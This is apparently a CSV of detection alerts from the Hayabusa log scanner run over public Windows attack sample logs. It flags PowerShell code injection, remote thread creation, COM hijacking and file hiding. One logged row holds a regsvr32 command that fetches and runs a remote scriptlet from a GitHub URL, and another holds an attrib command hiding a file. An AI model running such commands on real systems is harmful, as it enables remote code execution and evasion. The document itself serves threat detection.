2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
